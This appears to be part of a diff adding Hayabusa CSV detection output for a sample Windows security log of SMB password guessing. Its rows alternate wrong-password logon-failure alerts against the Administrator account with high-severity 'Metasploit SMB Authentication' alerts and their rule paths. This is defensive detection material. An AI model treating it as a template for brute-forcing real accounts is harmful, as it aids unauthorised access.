+2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8jplFaHgwrWpFY8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fQ9L626fGZQkNC25  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HfplQ16d7lsObzki  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c30ILHx5sYZCMflg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.084 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GMsJKiYmbgbr9wF0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q2hpQI6z68MVBzoW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDgzJjXBnWDSVjdg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0XU5HdsnM0Lvpvq2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pjmtkv6JDb4s2WnR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I6mBM2WMWlKkQHZl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3jo7coI8uS8JCorc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1ao6QcPI3nzpNnHi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.406 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WkP8vstCEOH9wnUW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QzrhcYEue85zhZ8V  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ivpdjGaxoZOCTxbq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.531 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIsZXHE4Swkbytiu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.572 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bdT2bVjtEd6KhQWf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RT9Tqp0lf0dd6h9C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xwhlrl2ck1o2qTDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.696 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lxX2762Fa804981t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: O55rRqTo9vgwnYoq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zo7BzxXZDdykOXoZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.828 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6YGEMcvYtwNJys39  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V0xq8et2LwWSgVgk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 43EK0cGlZBhWRd5B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UBoGMdTjWVVVvifn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:06.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IcCrPXp3VLObGU6v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.038 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zhZguuPimqAruiTu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5o6amdSWFFbueCyp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: W0wRaNXdhMlIY1HX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J8jqrrwWeKZGypW0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.192 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LIavw2zakOP4DqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qz7gr4vA633waQ01  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2TmHz5POLSNJHm2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DcpOxhy2nnLIEGHT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gJxfDgfujy5Um2wa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 217VTq8EbYIDeSXU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WPfE1m0tsJAJnRt9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OQCfGhvBMSq3PIoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XBl6JIRetWEnjaVx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KXJMNnj4LeBIYARt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v3sdn9f4xtvcsaHp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DWT0NepMYD29cOwh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DDb7wV6uzj1tat2d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RBcmANUL4a6DFobS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:07.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VL2swHF9MtnCfnp3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
